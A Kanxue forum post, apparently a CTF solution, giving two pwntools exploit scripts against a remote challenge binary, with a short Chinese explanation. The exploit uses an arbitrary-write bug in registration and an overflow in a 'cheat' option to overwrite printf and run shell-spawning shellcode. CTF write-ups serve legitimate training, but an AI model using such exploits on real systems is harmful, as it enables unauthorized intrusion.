[讨论]解答-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[讨论]解答

发表于: 2017-11-7 01:00 2921

[讨论]解答

Loka

2017-11-7 01:00

2921

照虎画猫，把dalao们第四题的代码抄来改改，现学现用，pwntools真是好东西。

from pwn import *
   
context(os='linux', arch='amd64', log_level='debug')
context.terminal = '/bin/sh'
#p = process('./pwn')
p = remote("123.206.22.95", 8888)
   
def signin(name, passwd, character):
    p.recvuntil("==============================")
    p.recvuntil("==============================")
    p.sendline("2")
    p.recvuntil("input your username")
    p.sendline(str(name))
    p.recvuntil("input your password")
    p.sendline(str(passwd))
    p.recvuntil("input your character's name")
    p.sendline(str(character))
   
def login(name, passwd):
    p.recvuntil("==============================")
    p.recvuntil("==============================")
    p.sendline("1")
    p.recvuntil("Input your username:")
    p.sendline(str(name))
    p.recvuntil("Input your password:")
    p.sendline(str(passwd))
  
def cheat(content):
    p.recvuntil("#####################")
    p.recvuntil("0.exit")
    p.sendline("5")
    p.recvuntil("content:")
    p.sendline(str(content))
    p.recvuntil("#####################")
    p.recvuntil("0.exit")
    p.sendline("1")
  
name = p64(0x6050F0)
passwd = p64(0x0)
character = p64(0x0)
signin(name, passwd, character)
  
name = p64(0x605038)
passwd = p64(0x0)
character = p64(0x0)
signin(name, passwd, character)
  
name = p64(0x605020)
passwd = p64(0x0)
character = p64(0x0)
signin(name, passwd, character)
login(name, passwd)
payload = p64(0x9090909090909090)*3+asm(shellcraft.sh())
cheat(payload)
  
p.interactive()

大体思路：发现注册处在检查地址有效性时存在问题，将数据当做地址指针返回，导致可以任意地址写，结合cheat处的内存溢出，可以构造出攻击过程。先注册三次，用前两次的用户名分别将printf函数和cheat的数据指针改写，最后用cheat将shellcode布进cheat的数据区，调用游戏内容的1号选项，将会触发printf函数，最终跑起shellcode。

尝试了一下，找到另一种做法：

from pwn import *
    
context(os='linux', arch='amd64', log_level='debug')
context.terminal = '/bin/sh'
#p = process('./pwn')
p = remote("123.206.22.95", 8888)
    
def signin(name, passwd, character):
    p.recvuntil("==============================")
    p.recvuntil("==============================")
    p.sendline("2")
    p.recvuntil("input your username")
    p.sendline(str(name))
    p.recvuntil("input your password")
    p.sendline(str(passwd))
    p.recvuntil("input your character's name")
    p.sendline(str(character))
    
def login(name, passwd):
    p.recvuntil("==============================")
    p.recvuntil("==============================")
    p.sendline("1")
    p.recvuntil("Input your username:")
    p.sendline(str(name))
    p.recvuntil("Input your password:")
    p.sendline(str(passwd))
   
def cheat1(name, content):
    p.recvuntil("#####################")
    p.recvuntil("0.exit")
    p.sendline("5")
    p.recvuntil("name:")
    p.sendline(str(content))
    p.recvuntil("content:")
    p.sendline(str(content))
    p.recvuntil("#####################")
    p.recvuntil("0.exit")
    p.sendline("0")
 
def cheat2(content):
    p.recvuntil("#####################")
    p.recvuntil("0.exit")
    p.sendline("5")
    p.recvuntil("content:")
    p.sendline(str(content))
    p.recvuntil("#####################")
    p.recvuntil("0.exit")
    p.sendline("1")
   
name = p64(0x605038)
passwd = p64(0x0)
character = p64(0x0)
signin(name, passwd, character)
login(name, passwd)
cheat1('test', 'test')
 
name = p64(0x605020)
passwd = p64(0x0)
character = p64(0x0)
signin(name, passwd, character)
login(name, passwd)
payload = p64(0x9090909090909090)*11+p64(0x604F98)+p64(0x9090909090909090)*2+asm(shellcraft.sh())
cheat2(payload)
   
p.interactive()<br>

[注意]看雪招聘，专注安全领域的专业人才平台！

收藏・0

免费

支持

最新回复 (1)
我是一条咸鱼雪币： 3170 活跃值： (129) 能力值： ( LV3，RANK：30 ) 在线值：发帖 7 回帖 61 粉丝 0 关注私信	我是一条咸鱼 2 楼看不懂 2017-11-14 15:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

Loka

发帖

131

回帖

403

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (1)
我是一条咸鱼雪币： 3170 活跃值： (129) 能力值： ( LV3，RANK：30 ) 在线值：发帖 7 回帖 61 粉丝 0 关注私信	我是一条咸鱼 2 楼看不懂 2017-11-14 15:51 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[讨论]解答

账号登录 验证码登录

账号登录

验证码登录